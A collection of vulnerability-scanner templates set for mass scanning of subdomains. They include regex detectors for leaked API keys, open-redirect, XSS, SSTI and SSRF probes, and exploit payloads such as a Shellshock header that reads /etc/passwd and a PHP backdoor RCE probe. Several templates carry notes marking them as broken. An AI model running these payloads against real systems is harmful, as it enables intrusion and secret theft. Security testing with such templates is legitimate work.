--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/sendgrid-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: sendgrid-api-key
2 |
3 | info:
4 | name: Sendgrid API Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/shoppable-token.yaml:
--------------------------------------------------------------------------------
1 | id: shoppable-token
2 |
3 | info:
4 | name: Shoppable Service Auth Token
5 | author: philippedelteil
6 | severity: info
7 | reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | part: body
25 | words:
26 | - data-shoppable-auth-token
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/slack-bot-token.yaml:
--------------------------------------------------------------------------------
1 | id: slack-bot-token
2 |
3 | info:
4 | name: Slack access token
5 | author: nadino
6 | severity: info
7 | tags: exposure,token,slack
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "xoxb-[0-9A-Za-z\\-]{51}"
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/slack-user-token.yaml:
--------------------------------------------------------------------------------
1 | id: slack-user-token
2 |
3 | info:
4 | name: Slack User token disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,slack
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "xoxp-[0-9A-Za-z\\-]{72}"
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/slack-webhook-token.yaml:
--------------------------------------------------------------------------------
1 | id: slack-webhook-token
2 |
3 | info:
4 | name: Slack Webhook Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,slack
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}"
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/sonarqube-token.yaml:
--------------------------------------------------------------------------------
1 | id: sonarqube-token
2 |
3 | info:
4 | name: SonarQube Token Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?"
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/stripe-restricted-key.yaml:
--------------------------------------------------------------------------------
1 | id: stripe-restricted-key
2 |
3 | info:
4 | name: Stripe Restricted Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'rk_(?:live|test)_[0-9a-zA-Z]{24}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/stripe-secret-key.yaml:
--------------------------------------------------------------------------------
1 | id: stripe-secret-key
2 |
3 | info:
4 | name: Stripe Secret Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'sk_(?:live|test)_[0-9a-zA-Z]{24}'
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/zapier-webhook-token.yaml:
--------------------------------------------------------------------------------
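1 | id: zapier-webhook-token  # reports Zapier catch-hook URLs found in a response body
2 |
3 | info:
4 | name: Zapier Webhook Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:  # the dot after "www" is escaped so it matches a literal '.', like the other dots in the host name
26 | - 'https://(?:www\.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/'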
--------------------------------------------------------------------------------
/Templates/Exposed-Tokens/zoho-webhook-token.yaml:
--------------------------------------------------------------------------------
1 | id: zoho-webhook-token
2 |
3 | info:
4 | name: Zoho Webhook Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | extractors:
23 | - type: regex
24 | part: body
25 | regex:
26 | - 'https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+'
--------------------------------------------------------------------------------
/Templates/Misconfiguration/attitude-theme-open-redirect.yaml:
--------------------------------------------------------------------------------
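1 | id: attitude-theme-open-redirect  # checks whether go.php of the Attitude theme redirects to the URL passed in the query string
2 |
3 | info:
4 | name: WordPress Attitude Themes 1.1.1 Open Redirection
5 | author: 0x_Akoko
6 | severity: low
7 | reference: https://cxsecurity.com/issue/WLB-2020030185
8 | tags: wordpress,wp-theme,redirect
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /wp-content/themes/Attitude/go.php?https://example.com/ HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers:
21 | - type: regex
22 | regex:  # (?i) added: header field names are case-insensitive, so a lowercase "location:" header must match too
23 | - '(?mi)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
24 | part: header
25 |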
--------------------------------------------------------------------------------
/Templates/Misconfiguration/brandfolder-open-redirect.yaml:
--------------------------------------------------------------------------------
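1 | id: brandfolder-open-redirect  # checks whether callback.php of the brandfolder plugin redirects to the URL passed in wp_abspath
2 |
3 | info:
4 | name: Wordpress brandfolder plugin Open Redirect
5 | author: 0x_Akoko
6 | severity: low
7 | reference: https://www.exploit-db.com/exploits/39591
8 | tags: wordpress,wp-plugin,lfi,rfi,redirect  # "redirect" added so the template is selected with the other open-redirect checks
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/ HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers:
21 | - type: regex
22 | regex:  # (?i) added: header field names are case-insensitive, so a lowercase "location:" header must match too
23 | - '(?mi)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
24 | part: header
25 |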
--------------------------------------------------------------------------------
/Templates/Misconfiguration/cache-poisoning.yaml:
--------------------------------------------------------------------------------
1 | id: cache-poisoning  # sends X-Forwarded-* headers and looks for their value in the response
2 |
3 | info:
4 | name: Cache Poisoning
5 | author: melbadry9,xelkomy
6 | severity: info
7 | reference: |
8 | - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
9 | - https://portswigger.net/research/practical-web-cache-poisoning
10 | tags: cache
11 |
12 | requests:
13 | - payloads:
14 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
15 | attack: sniper
16 | threads: 100
17 |
18 | raw:  # NOTE(review): the three X-Forwarded-* headers in the request below have no value, so there is no marker to look for in the response; the values appear to have been lost from this copy
19 | - |
20 | GET / HTTP/1.1
21 | Host: {{Subdomains}}
22 | X-Forwarded-Prefix:
23 | X-Forwarded-Host:
24 | X-Forwarded-For:
25 | matchers:
26 | - type: word
27 | words:
28 | - ""  # NOTE(review): an empty word is contained in every response, so this matcher presumably reports every host; it should be the marker value sent in the headers, and a cached-response check is still needed to tell reflection from poisoning
29 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/eatery-restaurant-open-redirect.yaml:
--------------------------------------------------------------------------------
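1 | id: eatery-restaurant-open-redirect  # checks whether nav.php of the eatery theme redirects to the URL passed in the -Menu- parameter
2 |
3 | info:
4 | name: WordPress Eatery Restaurant Theme Open Redirection
5 | author: 0x_Akoko
6 | severity: low
7 | reference: https://cxsecurity.com/issue/WLB-2020030183
8 | tags: wordpress,wp-theme,redirect
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /wp-content/themes/eatery/nav.php?-Menu-=https://example.com/ HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers:
21 | - type: regex
22 | regex:  # (?i) added: header field names are case-insensitive, so a lowercase "location:" header must match too
23 | - '(?mi)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
24 | part: header
25 |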
--------------------------------------------------------------------------------
/Templates/Misconfiguration/elasticsearch-1.yaml:
--------------------------------------------------------------------------------
1 | id: elasticsearch 1  # NOTE(review): the id contains a space while the file is named elasticsearch-1.yaml; confirm the engine accepts it
2 |
3 | info:
4 | name: ElasticSearch Information Disclosure
5 | author: Shine
6 | severity: low
7 | tags: elastic,unauth
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /_cat/indices?v HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and  # both the word and the status matcher must hold
23 | matchers:
24 | - type: word
25 | words:
26 | - '"took":'  # NOTE(review): "took" is a field of JSON search responses (it fits the /_all/_search request in elasticsearch-2.yaml); /_cat/indices?v normally returns a plain-text table, so this word presumably never matches here and an open index listing goes unreported; verify against a test instance
27 | - type: status
28 | status:
29 | - 200
30 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/elasticsearch-2.yaml:
--------------------------------------------------------------------------------
1 | id: elasticsearch 2
2 |
3 | info:
4 | name: ElasticSearch Information Disclosure
5 | author: Shine
6 | severity: low
7 | tags: elastic,unauth
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /_all/_search HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 | - type: word
25 | words:
26 | - '"took":'
27 | - type: status
28 | status:
29 | - 200
30 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/exposed-kafdrop.yaml:
--------------------------------------------------------------------------------
1 | id: exposed-kafdrop
2 |
3 | info:
4 | name: Publicly exposed Kafdrop Interface
5 | author: dhiyaneshDk
6 | severity: low
7 | tags: exposure,misconfig
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | words:
25 | - "Kafdrop: Broker List"
26 | - "Kafka Cluster Overview"
27 | condition: and
28 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/jira-unauthenticated-user-picker.yaml:
--------------------------------------------------------------------------------
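1 | id: jira-unauthenticated-user-picker  # flags Jira hosts that serve the user-picker popup to a request carrying no session
2 |
3 | info:
4 | name: Jira Unauthenticated User Picker
5 | author: TechbrunchFR
6 | severity: info
7 | tags: atlassian,jira
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /secure/popups/UserPickerBrowser.jspa HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | matchers-condition: and  # both matchers below must hold
22 | matchers:
23 | - type: word
24 | words:
25 | - 'user-picker'
26 | - type: status  # added: the original listed a single matcher under "and"; requiring 200 keeps login redirects and error pages that merely mention the word from being reported
27 | status:
28 | - 200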
--------------------------------------------------------------------------------
/Templates/Misconfiguration/jkstatus-manager.yaml:
--------------------------------------------------------------------------------
1 | id: jkstatus-manager
2 |
3 | info:
4 | name: JK Status Manager
5 | author: pdteam
6 | severity: low
7 | tags: config
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /jkstatus/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | X-Forwarded-For: 127.0.0.1
21 | Accept-Encoding: gzip, deflate
22 | Accept: */*
23 | matchers:
24 | - type: word
25 | words:
26 | - "JK Status Manager"
27 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/lucee-xss-1.yaml:
--------------------------------------------------------------------------------
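1 | id: lucee-xss 1  # checks whether the Lucee error page reflects markup from the request path unescaped
2 |
3 | info:
4 | name: Lucee Unauthenticated Reflected XSS
5 | author: incogbyte
6 | severity: medium
7 | tags: lucee,xss
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:  # the first word was emptied when the page was extracted; it is restored as the URL-decoded form of the markup in the request path, so the match requires an unescaped reflection
23 | - "<img src=a onerror=alert('{{randstr}}')>"
24 | - "MissingIncludeException"
25 | - "lucee-err"
26 | part: body
27 | condition: and  # all three words must be present in the body
28 |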
--------------------------------------------------------------------------------
/Templates/Misconfiguration/lucee-xss-2.yaml:
--------------------------------------------------------------------------------
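1 | id: lucee-xss 2  # same check as lucee-xss 1, with the request path placed under /lucee/
2 |
3 | info:
4 | name: Lucee Unauthenticated Reflected XSS
5 | author: incogbyte
6 | severity: medium
7 | tags: lucee,xss
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:  # the first word was emptied when the page was extracted; it is restored as the URL-decoded form of the markup in the request path, so the match requires an unescaped reflection
23 | - "<img src=a onerror=alert('{{randstr}}')>"
24 | - "MissingIncludeException"
25 | - "lucee-err"
26 | part: body
27 | condition: and  # all three words must be present in the body
28 |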
--------------------------------------------------------------------------------
/Templates/Misconfiguration/nginx-status.yaml:
--------------------------------------------------------------------------------
1 | id: nginx-status
2 |
3 | info:
4 | name: Nginx Status Page
5 | author: dhiyaneshDK
6 | severity: low
7 | tags: misconfig,nginx
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /nginx_status HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 | - type: word
25 | words:
26 | - 'Active connections:'
27 |
28 | - type: status
29 | status:
30 | - 200
31 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/php-zerodium-backdoor-rce.yaml:
--------------------------------------------------------------------------------
1 | id: php-zerodium-backdoor-rce  # detects a PHP build carrying the backdoor described in the reference below
2 |
3 | info:
4 | name: PHP Zerodium Backdoor RCE
5 | author: dhiyaneshDk
6 | reference: https://news-web.php.net/php.internals/113838
7 | severity: high
8 | tags: php,backdoor
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:  # the header name "User-Agentt" in the request below is spelled that way on purpose: it is the header this check probes, so it must not be "corrected" to User-Agent
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | Accept-Encoding: gzip, deflate
21 | Connection: close
22 | User-Agentt: zerodiumvar_dump(233*233);
23 | matchers-condition: and  # only one matcher is listed, so the condition has no effect here
24 | matchers:
25 |
26 | - type: word
27 | words:
28 | - "int(54289)"  # 233*233 = 54289: the var_dump output of the arithmetic sent in the request, which only an affected build would evaluate
29 | part: body
30 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/rce-shellshock-user-agent.yaml:
--------------------------------------------------------------------------------
1 | id: rce-user-agent-shell-shock
2 |
3 | info:
4 | name: Remote Code Execution Via (User-Agent)
5 | author: 0xelkomy
6 | severity: high
7 | tags: shellshock,rce
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /cgi-bin/status HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'
20 | matchers:
21 | - type: regex
22 | regex:
23 | - "root:.*:0:0"
24 | part: body
--------------------------------------------------------------------------------
/Templates/Misconfiguration/twig-php-ssti.yaml:
--------------------------------------------------------------------------------
1 | id: twig-php-ssti  # sends an arithmetic template expression in search_key and looks for its product in the body
2 |
3 | info:
4 | name: Twig PHP <2.4.4 template engine - SSTI
5 | author: madrobot
6 | severity: high
7 | tags: php,ssti
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:  # NOTE(review): the request below carries {{1337*1338}} unencoded; the scanner uses the same {{...}} syntax for its own placeholders (see {{Subdomains}}), so the expression may be resolved or rejected before the request is sent. Confirm, and URL-encode the braces if so
16 | - |
17 | GET /search?search_key={{1337*1338}} HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | words:
25 | - "1788906"  # 1337*1338 = 1788906; NOTE(review): a bare number with no status or context matcher can also occur in a page by coincidence, so a hit needs manual confirmation
26 | part: body
27 |
--------------------------------------------------------------------------------
/Templates/Misconfiguration/unauthenticated-lansweeper.yaml:
--------------------------------------------------------------------------------
# Requests /Default.aspx and reports a hit when the Lansweeper main-page
# title text is returned.
id: unauthenticated-lansweeper

info:
  name: Unauthenticated Lansweeper Instance
  severity: high
  author: divya_mudgal
  tags: lansweeper,unauth

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /Default.aspx HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      # No `part` is given, so the matcher's default part applies.
      - type: word
        words: ['Main page - Lansweeper']
--------------------------------------------------------------------------------
/Templates/Misconfiguration/vmware-vcenter-lfi-linux.yaml:
--------------------------------------------------------------------------------
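# Requests /eam/vib with id=/etc/issue and reports a hit when the response
# contains the "vCenter Server" banner text.
#
# The id previously ended in " 1"; a template id should be a single token
# without spaces, so it now matches the file name.
id: vmware-vcenter-lfi-linux

info:
  name: Vmware Vcenter LFI for Linux appliances
  author: PR3R00T
  severity: high
  tags: vmware,lfi

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /eam/vib?id=/etc/issue HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    # NOTE(review): `and` has only one matcher to combine here; a second
    # check (for example on the status code) looks to be missing. Confirm
    # against the template this was derived from.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "vCenter Server"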
--------------------------------------------------------------------------------
/Templates/Misconfiguration/wp-xmlrpc.yaml:
--------------------------------------------------------------------------------
# Requests /xmlrpc.php with GET and reports a hit when the endpoint answers
# with its "POST requests only" notice, i.e. the XML-RPC interface is present.
id: wordpress-xmlrpc-file

info:
  name: WordPress xmlrpc
  severity: info
  author: udit_thakkur
  tags: wordpress

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /xmlrpc.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      - type: word
        words: ["XML-RPC server accepts POST requests only."]

--------------------------------------------------------------------------------
/Templates/Misconfiguration/wptouch-open-redirect.yaml:
--------------------------------------------------------------------------------
# Requests the site root with wptouch_switch=desktop and a redirect parameter
# pointing at example.com, then checks whether a Location header sends the
# client to that external host.
id: wptouch-open-redirect

info:
  name: WPTouch Switch Desktop 3.x Open Redirection
  severity: medium
  author: 0x_Akoko
  tags: wp-plugin,redirect,wordpress
  reference: https://cxsecurity.com/issue/WLB-2020030114

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /?wptouch_switch=desktop&redirect=https://example.com/ HTTP/1.1
        Host: {{Subdomains}}

    matchers:
      # Matches a Location header whose target host ends in example.com,
      # with either an explicit scheme or a protocol-relative "//" prefix.
      - part: header
        type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'

--------------------------------------------------------------------------------
/Templates/SSRF/linkerd-ssrf-detect.yaml:
--------------------------------------------------------------------------------
# Sends a request carrying an l5d-dtab override header that points service
# resolution at an external host name.
#
# NOTE(review): this template defines no matchers, so nothing visible here
# evaluates the response; any result would have to be observed out of band
# (the `oob` tag suggests that is the intent). Confirm how hits are recorded.
id: linkerd-ssrf-detection

info:
  name: Linkerd SSRF detection
  severity: high
  author: dudez
  reference: https://twitter.com/nirvana_msu/status/1084144955034165248
  tags: ssrf,linkerd,oob

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    # NOTE(review): {{Host}}, {{Port}} and {{MY-DOMAIN}} are not defined in
    # this template; they must be supplied from outside it. Verify before use.
    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        Accept-Encoding: gzip, deflate
        l5d-dtab: /svc/* => /$/inet/{{Host}}.{{Port}}.{{Subdomains}}.linkerd.{{MY-DOMAIN}}/443

--------------------------------------------------------------------------------
/Templates/Technologies/cockpit-detect.yaml:
--------------------------------------------------------------------------------
# Fingerprints Agentejo Cockpit by requesting /auth/login and looking for its
# login prompt text.
id: cockpit-detect

info:
  name: Detect Agentejo Cockpit
  severity: info
  author: dwisiswant0

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /auth/login HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        words: ['Authenticate Please!']
--------------------------------------------------------------------------------
/Templates/Technologies/default-iis7-page.yaml:
--------------------------------------------------------------------------------
# Fingerprints a default IIS 7 landing page by looking for "IIS7" in the body
# of the site root.
id: default-iis7-page

info:
  name: IIS-7 Default Page
  severity: info
  author: dhiyaneshDk
  reference: https://www.shodan.io/search?query=http.title%3A%22IIS7%22
  tags: tech,iis

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      # NOTE(review): the word is matched anywhere in the body, not only in
      # the page title the reference query uses.
      - part: body
        type: word
        words: ['IIS7']
--------------------------------------------------------------------------------
/Templates/Technologies/dotclear-detect-2.yaml:
--------------------------------------------------------------------------------
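# Fingerprints Dotclear by requesting /auth.php and requiring both the word
# "Dotclear" in the response and a 200 status.
#
# The id previously read "dotclear-detect 2"; a template id should be a
# single token without spaces, so it now matches the file name.
id: dotclear-detect-2

info:
  name: Dotclear Detect
  author: pikpikcu
  severity: info
  tags: tech,dotclear

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /auth.php HTTP/1.1
        Host: {{Subdomains}}
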